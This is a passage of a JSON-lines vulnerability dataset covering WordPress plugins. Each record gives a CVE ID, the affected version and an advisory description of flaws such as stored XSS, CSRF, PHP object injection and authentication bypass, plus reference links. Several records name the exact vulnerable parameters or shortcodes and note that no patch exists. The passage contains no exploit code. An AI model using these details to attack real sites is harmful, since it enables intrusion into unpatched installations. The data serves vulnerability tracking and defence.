replacement.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-css-js-php\\\/trunk\\\/modules\\\/code\\\/model.code.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-css-js-php\\\/trunk\\\/modules\\\/code\\\/model.code.php#L85\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d21dc02f-789c-497e-9d01-02fa49bf9e30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d21dc02f-789c-497e-9d01-02fa49bf9e30?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2497","slug":"userpro","versionImpact":"5.1.0","description":"The UserPro plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.1.0. This is due to missing or incorrect nonce validation on the 'import_settings' function. This makes it possible for unauthenticated attackers to exploit PHP Object Injection due to the use of unserialize() on the user supplied parameter via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbb601ce-a884-4894-af13-dab14885c7eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbb601ce-a884-4894-af13-dab14885c7eb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1088","slug":"password-protected-woo-store","versionImpact":"1.9","description":"The Password Protected Store for WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.9 via the REST API. This makes it possible for unauthenticated attackers to extract sensitive data including post titles and content.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ae1e8fd-4d1b-4590-a141-f93d6347c0f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ae1e8fd-4d1b-4590-a141-f93d6347c0f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/password-protected-woo-store\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/password-protected-woo-store\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6767","slug":"wordsurvey","versionImpact":"3.2","description":"The WordSurvey plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018sounding_title\u2019 parameter in all versions up to, and including, 3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/626dac34-6b25-42c9-8f7d-9899e4bcc039?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/626dac34-6b25-42c9-8f7d-9899e4bcc039?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordsurvey\\\/trunk\\\/wordsurvey-add.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordsurvey\\\/trunk\\\/wordsurvey-add.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wordsurvey\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wordsurvey\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8516","slug":"themesflat-addons-for-elementor","versionImpact":"2.2.1","description":"The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2.1 via the render() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract limited post information from draft and future scheduled posts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75c5d4e6-9ef3-4b12-9ee9-67121dbb0fcd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75c5d4e6-9ef3-4b12-9ee9-67121dbb0fcd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-posts.php#L3327\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-posts.php#L3327\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10181","slug":"newsletters-lite","versionImpact":"4.9.9.4","description":"The Newsletters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's newsletters_video shortcode in all versions up to, and including, 4.9.9.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/915c46f9-a342-4cc6-a726-2f1581a5d481?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/915c46f9-a342-4cc6-a726-2f1581a5d481?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/newsletters-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/newsletters-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3175816\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3175816\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11038","slug":"wpb-popup-for-contact-form-7","versionImpact":"1.7.5","description":"The The WPB Popup for Contact Form 7 \u2013 Showing The Contact Form 7 Popup on Button Click \u2013 CF7 Popup plugin for WordPress is vulnerable to arbitrary shortcode execution via wpb_pcf_fire_contact_form AJAX action in all versions up to, and including, 1.7.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7faa800-3b29-4b79-8b94-1e7985acb50d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7faa800-3b29-4b79-8b94-1e7985acb50d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpb-popup-for-contact-form-7\\\/tags\\\/1.7.4\\\/includes\\\/class.ajax.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpb-popup-for-contact-form-7\\\/tags\\\/1.7.4\\\/includes\\\/class.ajax.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpb-popup-for-contact-form-7\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpb-popup-for-contact-form-7\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188864\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188864\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/gist.github.com\\\/wpbean\\\/1a5abfea883621b4e150eab1362a420f\",\"name\":\"https:\\\/\\\/gist.github.com\\\/wpbean\\\/1a5abfea883621b4e150eab1362a420f\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5541","slug":"runners-log","versionImpact":"3.9.2","description":"The Runners Log plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'runnerslog' shortcode in all versions up to, and including, 3.9.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/runners-log\\\/trunk\\\/runnerslog_chart.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/runners-log\\\/trunk\\\/runnerslog_chart.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cca53aba-b7dd-4b78-b2ac-c69050308e94?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cca53aba-b7dd-4b78-b2ac-c69050308e94?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4784","slug":"hueman-addons","versionImpact":"2.3.3","description":"The Hueman Addons WordPress plugin through 2.3.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a30c6f1e-62fd-493d-ad5e-1b55ceec62a9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a30c6f1e-62fd-493d-ad5e-1b55ceec62a9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2027","slug":"zm-ajax-login-register","versionImpact":"2.0.2","description":"The ZM Ajax Login & Register plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.0.2. This is due to insufficient verification on the user being supplied during a Facebook login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zm-ajax-login-register\\\/trunk\\\/src\\\/ALRSocial\\\/ALRSocialFacebook.php#L58\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zm-ajax-login-register\\\/trunk\\\/src\\\/ALRSocial\\\/ALRSocialFacebook.php#L58\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b10d01ec-54ef-456b-9410-ed013343a962?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b10d01ec-54ef-456b-9410-ed013343a962?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4378","slug":"wp-quick-front-end-editor","versionImpact":"5.5","description":"The WP Quick FrontEnd Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 5.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with minimal permissions like subscribers, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed137706-1313-4bff-882b-13d9fa11498c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed137706-1313-4bff-882b-13d9fa11498c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-vulnerabilities-in-wordpress-wp-quick-frontend-editor-plugin-unpatched\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-vulnerabilities-in-wordpress-wp-quick-frontend-editor-plugin-unpatched\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3063","slug":"sp-client-document-manager","versionImpact":"4.67","description":"The SP Project & Document Manager plugin for WordPress is vulnerable to Insecure Direct Object References in versions up to, and including, 4.67. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for authenticated attackers with subscriber privileges or above, to change user passwords and potentially take over administrator accounts.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sp-client-document-manager\\\/trunk\\\/classes\\\/ajax.php#L149\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sp-client-document-manager\\\/trunk\\\/classes\\\/ajax.php#L149\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dc2e720-85d9-42d9-94ef-eb172425993d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dc2e720-85d9-42d9-94ef-eb172425993d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0825","slug":"vimeography","versionImpact":"2.3.2","description":"The Vimeography: Vimeo Video Gallery WordPress Plugin plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.3.2 via deserialization of untrusted input via the vimeography_duplicate_gallery_serialized in the duplicate_gallery function. This makes it possible for authenticated attackers attackers, with contributor access or higher, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/853516b2-ec50-4937-89d3-d16042a6f71c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/853516b2-ec50-4937-89d3-d16042a6f71c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vimeography\\\/trunk\\\/lib\\\/api\\\/galleries.php#L816\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vimeography\\\/trunk\\\/lib\\\/api\\\/galleries.php#L816\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2688","slug":"embedpress","versionImpact":"3.9.12","description":"The EmbedPress \u2013 Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the EmbedPress document widget in all versions up to, and including, 3.9.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5b67927-5993-4e21-af52-8ebe7fee48ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5b67927-5993-4e21-af52-8ebe7fee48ab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3055856%40embedpress&new=3055856%40embedpress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3055856%40embedpress&new=3055856%40embedpress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5266","slug":"download-manager","versionImpact":"3.2.92","description":"The Download Manager Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via wpdm_user_dashboard, wpdm_package, wpdm_packages, wpdm_search_result, and wpdm_tag shortcodes in all versions up to, and including, 3.2.92 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e363a62-8d31-4140-878b-5034d6c7b6a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e363a62-8d31-4140-878b-5034d6c7b6a1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/wpdm-functions.php?rev=3052986#L216\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/wpdm-functions.php?rev=3052986#L216\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/wpdm-functions.php?rev=3052986#L261\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/wpdm-functions.php?rev=3052986#L261\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/User\\\/views\\\/dashboard\\\/profile.php?rev=2558306#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/User\\\/views\\\/dashboard\\\/profile.php?rev=2558306#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/User\\\/Dashboard.php?rev=2799791#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/User\\\/Dashboard.php?rev=2799791#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/User\\\/Dashboard.php?rev=2799791#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/User\\\/Dashboard.php?rev=2799791#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/views\\\/link-templates\\\/link-template-bsthumnail.php?rev=2558306#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/views\\\/link-templates\\\/link-template-bsthumnail.php?rev=2558306#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/Shortcodes.php?rev=3052986#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/Shortcodes.php?rev=3052986#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/Shortcodes.php?rev=3052986#L255\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/Shortcodes.php?rev=3052986#L255\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/Shortcodes.php?rev=3052986#L337\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/Shortcodes.php?rev=3052986#L337\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/Shortcodes.php?rev=3052986#L315\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/Shortcodes.php?rev=3052986#L315\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-manager\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-manager\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_user_dashboard-user-dashboard-short-code\\\/\",\"name\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_user_dashboard-user-dashboard-short-code\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_package-single-package-embed-short-code\\\/\",\"name\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_package-single-package-embed-short-code\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_packages-wp_query-in-a-shortcode-for-download-manager-packages\\\/\",\"name\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_packages-wp_query-in-a-shortcode-for-download-manager-packages\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_search_result-shows-search-form\\\/\",\"name\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_search_result-shows-search-form\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_tag-query-all-downloads-from-specified-tags\\\/\",\"name\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_tag-query-all-downloads-from-specified-tags\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096450\\\/#file24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096450\\\/#file24\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8515","slug":"themesflat-addons-for-elementor","versionImpact":"2.2.1","description":"The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widgets like 'TF E Slider Widget', 'TF Video Widget', 'TF Team Widget' and more in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping on URL attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1603c61b-11a3-41e5-b339-a9411b02f383?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1603c61b-11a3-41e5-b339-a9411b02f383?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-flex-slide.php#L2522\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-flex-slide.php#L2522\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-video.php#L318\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-video.php#L318\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-team.php#L1234\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-team.php#L1234\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-team.php#L1285\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-team.php#L1285\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/tf-testimonial.js#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/tf-testimonial.js#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/tf-carousel.js#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/tf-carousel.js#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/tf-post.js#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/tf-post.js#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/tf-woo-product.js#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/tf-woo-product.js#L42\",\"refsource\":\"\",\"